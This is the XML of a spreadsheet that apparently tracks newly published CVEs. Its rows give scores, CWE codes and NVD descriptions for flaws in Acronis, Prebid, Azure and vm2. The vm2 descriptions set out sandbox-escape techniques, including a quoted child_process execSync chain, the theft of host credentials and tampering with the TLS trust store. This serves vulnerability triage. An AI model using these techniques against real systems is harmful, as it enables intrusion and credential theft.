    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T991" r:id="rId990"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T992" r:id="rId991"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T993" r:id="rId992"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T994" r:id="rId993"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T995" r:id="rId994"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T996" r:id="rId995"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T997" r:id="rId996"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T998" r:id="rId997"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T999" r:id="rId998"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1000" r:id="rId999"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1001" r:id="rId1000"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1002" r:id="rId1001"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1003" r:id="rId1002"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1004" r:id="rId1003"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1005" r:id="rId1004"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1006" r:id="rId1005"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1007" r:id="rId1006"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1008" r:id="rId1007"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1009" r:id="rId1008"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1010" r:id="rId1009"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1011" r:id="rId1010"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1012" r:id="rId1011"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1013" r:id="rId1012"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1014" r:id="rId1013"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1015" r:id="rId1014"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1016" r:id="rId1015"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1017" r:id="rId1016"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1018" r:id="rId1017"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1019" r:id="rId1018"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1020" r:id="rId1019"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1021" r:id="rId1020"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1022" r:id="rId1021"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1023" r:id="rId1022"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1024" r:id="rId1023"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1025" r:id="rId1024"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1026" r:id="rId1025"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1027" r:id="rId1026"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1028" r:id="rId1027"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1029" r:id="rId1028"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1030" r:id="rId1029"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1031" r:id="rId1030"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1032" r:id="rId1031"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1033" r:id="rId1032"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1034" r:id="rId1033"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1035" r:id="rId1034"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1036" r:id="rId1035"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1037" r:id="rId1036"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1038" r:id="rId1037"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1039" r:id="rId1038"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1040" r:id="rId1039"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1041" r:id="rId1040"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1042" r:id="rId1041"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1043" r:id="rId1042"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1044" r:id="rId1043"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1045" r:id="rId1044"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1046" r:id="rId1045"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1047" r:id="rId1046"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1048" r:id="rId1047"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1049" r:id="rId1048"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1050" r:id="rId1049"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1051" r:id="rId1050"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1052" r:id="rId1051"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1053" r:id="rId1052"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1054" r:id="rId1053"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1055" r:id="rId1054"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1056" r:id="rId1055"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1057" r:id="rId1056"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1058" r:id="rId1057"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1059" r:id="rId1058"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1060" r:id="rId1059"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1061" r:id="rId1060"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1062" r:id="rId1061"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1063" r:id="rId1062"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1064" r:id="rId1063"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1065" r:id="rId1064"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1066" r:id="rId1065"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1067" r:id="rId1066"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1068" r:id="rId1067"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1069" r:id="rId1068"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1070" r:id="rId1069"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1071" r:id="rId1070"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1072" r:id="rId1071"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1073" r:id="rId1072"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1074" r:id="rId1073"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1075" r:id="rId1074"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1076" r:id="rId1075"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1077" r:id="rId1076"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1078" r:id="rId1077"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1079" r:id="rId1078"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1080" r:id="rId1079"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1081" r:id="rId1080"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1082" r:id="rId1081"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1083" r:id="rId1082"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1084" r:id="rId1083"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1085" r:id="rId1084"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1086" r:id="rId1085"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1087" r:id="rId1086"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1088" r:id="rId1087"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1089" r:id="rId1088"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1090" r:id="rId1089"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1091" r:id="rId1090"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1092" r:id="rId1091"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1093" r:id="rId1092"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1094" r:id="rId1093"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1095" r:id="rId1094"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1096" r:id="rId1095"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1097" r:id="rId1096"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1098" r:id="rId1097"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1099" r:id="rId1098"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1100" r:id="rId1099"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1101" r:id="rId1100"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1102" r:id="rId1101"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1103" r:id="rId110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CVE-2026-87886</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security@acronis.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Local privilege escalation due to insecure file permissions. The following products are affected: Acronis Backup plugin for cPanel &amp; WHM (Linux) before build 1.9.3.1021, Acronis Backup extension for Plesk (Linux) before build 1.8.11.638, Acronis Backup plugin for DirectAdmin (Linux) before build 1.2.3.238.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54734</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Prebid Server Java is the Java version of Prebid Server. Prior to 3.43.0, certain bidder adapters interpolate user-supplied parameters into outbound request URLs without using HttpUtil to validate the resulting domain or path segment. A malicious actor who can supply bid-request parameters can cause the server to send HTTP requests to unintended destinations, potentially reaching internal network services, metadata endpoints, or other sensitive server endpoints with the server's network access. This issue is fixed in version 3.43.0.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54734</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62104</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Remote Code Execution (RCE) in Migratico Lite &lt;= 2.6.8 versions.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62104</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69399</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2026-09-17</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Azure Arc Elevation of Privilege Vulnerability</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69399</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69865</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2026-09-17</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Microsoft Container Registry allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69865</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70200</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-285</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Azure Logic Apps allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70200</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83944</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Azure Logic Apps allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83944</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85889</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Azure AI Foundry allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85889</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92937</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>10</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2026-09-17</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>vm2 3.11.6 is vulnerable to a sandbox escape leading to remote code execution in the host Node.js process. The fix for GHSA-m283-3h24-438v is incomplete: the bridge gate at lib/bridge.js:1624 identity-checks only the direct call target when deciding whether to rebuild/sanitise a rejected host Promise value. Registering the rejection handler through Function.prototype.call or .apply indirection (e.g., p.then.call(p, undefined, cb)) makes the intercepted target host Function.prototype.call, so the sanitiser never runs and the raw host error reaches sandbox code with its own properties intact. If an embedder exposes a host-realm Promise to the sandbox (an async host function bridged via the sandbox option, or a NodeVM external module's async method) and that Promise rejects with an Error carrying a non-primitive own property referencing a host object (for example err.detail = process), untrusted code in the sandbox obtains a fully functional proxy to that host object and can execute arbitrary commands with the privileges of the host process (e.g., e.detail.mainModule.require('child_process').execSync(...)). The direct p.then(undefined, cb), bind, and Reflect.apply forms are correctly sanitised. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92937</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92940</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.11.3 through 3.11.6 expose the host process's real https.globalAgent to sandboxed code when a NodeVM is explicitly configured to allow require('https'). The builtin loader wraps host modules in a read-only proxy, but method calls such as Agent.prototype.on() are forwarded to the underlying host object, so sandbox code can register a listener for the agent's 'free' event. When an unrelated host HTTPS request releases a pooled connection, the listener receives the live host request options and the host TLSSocket, allowing sandboxed code to read the host's Authorization header and private destination host/port, attach a data listener to the released socket and read subsequent host response bodies in plaintext, and issue attacker-chosen authenticated requests using the stolen credentials. The issue is fixed in 3.11.7.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92940</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92941</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>vm2 versions from 3.11.3 before 3.11.7 expose the host tls module to NodeVM sandbox code, allowing attackers to call tls.setDefaultCACertificates() and replace process-wide certificate authorities. Attackers with access to allowed tls and url builtins can use URLSearchParams to create host-realm arrays and manipulate the TLS trust store, enabling subsequent host HTTPS clients to accept attacker-controlled certificates.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92941</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92946</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
